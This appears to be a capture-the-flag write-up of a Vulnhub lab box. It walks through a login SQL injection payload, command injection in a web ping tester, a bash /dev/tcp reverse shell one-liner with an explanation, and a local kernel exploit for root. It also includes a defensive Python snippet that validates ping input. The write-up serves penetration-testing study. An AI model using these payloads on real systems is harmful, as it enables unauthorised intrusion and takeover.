Vulnhub virtual machine; on the path to OSCP, this box offered SQL injection on the login form and a web-based ping tester that could be manipulated into command execution for a foothold on the box. Classic enumeration of the box then led to a privilege escalation.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use information at your own risk.
By continued reading, you acknowledge the aforementioned user risk/responsibilities.
Enumeration
Find target on network
Target: 192.168.56.104
Nmap Scan
searchsploit search
DoS is not useful in this scenario.
Navigate to webpage
Test for SQL injection
username: admin' OR '1=1--
Successful injection! We are now faced with some sort of web-based PING tester.
Testing a ping for localhost
Looks like we have successful command execution on the box.
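As an added example (not code from the original post or from the target box), this is the shape the ping tester needs in order to avoid the command execution shown above: the host field is validated and handed to ping as its own argument, never interpolated into a shell string, and rejected inputs come back with a reason so the application can log them as injection attempts. Assumptions: the web side is Python, and only plain IP addresses and hostnames need to be accepted.

```python
import ipaddress
import re
import subprocess

# Any of these lets a "host" value escape a shell command string; a host never
# legitimately contains one, so a hit is a high-signal event worth logging.
SHELL_META_RE = re.compile(r"[;&|`$(){}<>\\\n\r\t'\" ]")

# Conservative RFC 1123 hostname grammar (assumption: IPs and DNS names only).
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def classify_target(raw: str):
    """Return (True, canonical_host) or (False, reason_for_rejection)."""
    value = raw.strip()
    if not value:
        return False, "empty target"
    if SHELL_META_RE.search(value):
        return False, f"shell metacharacter in target: {value!r}"
    try:
        # Accepts IPv4 and IPv6 literals, normalising their textual form.
        return True, str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return True, value.lower()
    return False, f"not an IP address or hostname: {value!r}"


def build_ping_argv(raw: str, count: int = 3):
    """Argument vector for ping; raises ValueError on anything not a host.

    The RCE above comes from pasting the field into a shell string. Here the
    fixed flags come first and the validated host is a separate argv element,
    so the kernel receives exactly these strings and no shell parses them.
    """
    ok, value = classify_target(raw)
    if not ok:
        raise ValueError(value)
    return ["ping", "-c", str(count), value]


def run_ping(raw: str, timeout: float = 15.0) -> str:
    """Run ping with shell=False (the default) and return its combined output."""
    result = subprocess.run(build_ping_argv(raw), capture_output=True,
                            text=True, timeout=timeout, check=False)
    return result.stdout + result.stderr
```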
Remote Code Execution
Attempt to grab the passwd file by submitting:
Whoami
We are ‘apache’.
Reverse Shell
Set up a listener on port 9000
Attempt to set up a reverse connection with an easy one-liner:
/bin/bash -i >& /dev/tcp/[ip_address]/[port] 0>&1
How it works:
bash -i >& : invoke bash with the interactive option (-i) and redirect both its standard output and standard error (>&) to the target that follows
/dev/tcp/[ip_address]/[port] : the redirection target is the /dev/tcp device file, so bash opens a TCP connection to the listener's address and port
0>&1 : redirect standard input to the same place as standard output, so commands typed on the listener side are read by bash over the same connection
Connection established to the box, and we are ‘apache’.
Upgrade Half Shell to Full Shell
Test for which python is available
Priv-Escalation
Investigate the environment
Running CentOS release 4.5 and Linux 2.6.9-55
Check searchsploit for vulnerabilities:
Interesting hit with Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10)
Mirror the exploit to the working directory
Inspect the exploit source for any embedded shellcode and replace it if needed.
Get the file over to the target box with a SimpleHTTPServer
As a good habit, save the file to the box's memory-backed filesystem at /dev/shm
Compile on the box:
Make the file executable: chmod 755 exploit
Root
Execute the exploit
Bring me the root!
-exec